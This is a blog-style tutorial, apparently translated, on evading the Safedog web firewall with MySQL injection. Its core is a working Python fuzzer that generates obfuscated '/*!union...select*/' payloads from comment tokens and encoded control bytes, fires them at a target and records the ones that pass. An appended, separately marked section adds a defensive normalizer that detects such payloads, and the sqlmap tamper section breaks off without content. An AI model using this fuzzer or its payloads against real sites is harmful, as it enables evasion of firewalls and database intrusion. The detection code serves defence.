MySQL injection: bypassing Safedog (安全狗) and modifying a sqlmap tamper script

This technique is borrowed from Va1n3R's video on 漏洞银行 (Bugbank); his script has been improved here.

PHP + MySQL + Apache environment and test source code

Environment: the PHPStudy bundle

Source code: FUZZ test source

Fuzz script

  • 1. Build a rule dictionary and a generator that yields payloads of n fuzz characters. (Without a generator, payloads of 8 characters or more cannot be run: there are over 300 million 8-character payloads, and holding them all in memory grinds the script to a halt. This is one change made to Va1n3R's script.)

  • 2. Analyse the page: which markers does the normal response contain? These are used to judge success.

  • 3. Iterate over the generator and build a payload for each request URL.

  • 4. If the request succeeds, write the URL to a txt file; otherwise only print new url:url.

  • 5. Print progress.

Code implementation:

#!/usr/bin/python
# coding:utf-8
import sys
import requests

# Rule dictionary: MySQL comment tokens and operators, whitespace, URL-encoded control characters.
# Kept at module level so both the generator and the progress counter can use it.
fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
fuzz_sz = ['', ' ']
fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
fuzz = fuzz_zs + fuzz_sz + fuzz_ch


def _generator():
    # Yield each 6-token combination lazily instead of building the whole list in memory
    for a in fuzz:
        for b in fuzz:
            for c in fuzz:
                for d in fuzz:
                    for e in fuzz:
                        for f in fuzz:
                            yield a + b + c + d + e + f


g = _generator()
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}
i = 0
glen = len(fuzz) ** 6  # total number of payloads, for the progress display
for st in g:
    i += 1
    url = "http://127.0.0.1/fuzz/index.php?id=1"
    url = url + " /*!union" + st + "select*/ 1,2,3"
    sys.stdout.write(' ' * 30 + '\r')
    print("[-] new URL: %s" % url)
    sys.stdout.write("正在测试:%d/%d" % (i, glen))
    sys.stdout.flush()
    res = requests.get(url, headers=headers)
    # The normal page contains the table header <td>id</td>; seeing it means the query executed
    if '<td>id</td>' in res.text:
        sys.stdout.write("[+] Find Bypass URL: %s\n" % url)
        with open('./apache.txt', 'a+') as f:
            f.write(url + '\n')

Finished multithreaded version:

mysql-injection-fuzz_thread

Finished multiprocess version:

mysql-injection-fuzz_process

Result demo:

Modifying the tamper script

Modify versionedmorekeywords.py, the sqlmap tamper script that wraps every keyword in a MySQL version comment.
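From the defender's side, both the fuzzed payloads above and the versioned-comment tamper only work because the WAF matches the raw string while MySQL executes the body of /*!...*/ and treats /*...*/ and control bytes as separators. The following Python example is added here (it is not from the post, Va1n3R's script or sqlmap) and normalizes a query-string value the way MySQL would read it before matching; the sample values are constructed.

```python
import re
from urllib.parse import unquote_plus

# Obfuscation layers the fuzz dictionary above exercises
_VERSION_COMMENT_OPEN = re.compile(r'/\*!\d{0,5}')       # /*! or /*!50000 : MySQL executes the body
_BLOCK_COMMENT = re.compile(r'/\*.*?\*/', re.DOTALL)     # ordinary /* ... */ : MySQL ignores the body
_STRAY_CLOSE = re.compile(r'\*/')                        # closer left over from a version comment
_CONTROL_OR_SPACE = re.compile(r'[\x00-\x20\x7f]+')      # NUL, \t, \n, \v, \f, \r, space: separators
_UNION_SELECT = re.compile(r'\bunion\s+(?:all\s+|distinct\s+)?select\b')


def normalize_sql(raw: str, passes: int = 2) -> str:
    """Reduce a raw query-string value to the SQL MySQL would actually parse."""
    s = raw
    for _ in range(passes):                 # handle single and double URL encoding
        s = unquote_plus(s)
    s = _VERSION_COMMENT_OPEN.sub(' ', s)   # keep the body of /*!...*/, it is executed
    s = _BLOCK_COMMENT.sub(' ', s)          # drop the body of /*...*/, it is a separator
    s = _STRAY_CLOSE.sub(' ', s)
    s = _CONTROL_OR_SPACE.sub(' ', s)       # collapse every control byte and space run
    return s.strip().lower()


def is_union_select(raw: str) -> bool:
    """True when the normalized value contains UNION [ALL|DISTINCT] SELECT."""
    return _UNION_SELECT.search(normalize_sql(raw)) is not None


# Constructed sample values (not from the page) in the shape the fuzzer produces
SAMPLES = [
    "1 /*!union%0a%0bselect*/ 1,2,3",
    "1 /*!50000union*//**/select 1,2,3",
    "1%20UNION/**/ALL/**/SELECT%201",
    "2",
    "5 /* keep */",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print("%-38r -> %-22r flagged=%s" % (value, normalize_sql(value), is_union_select(value)))
```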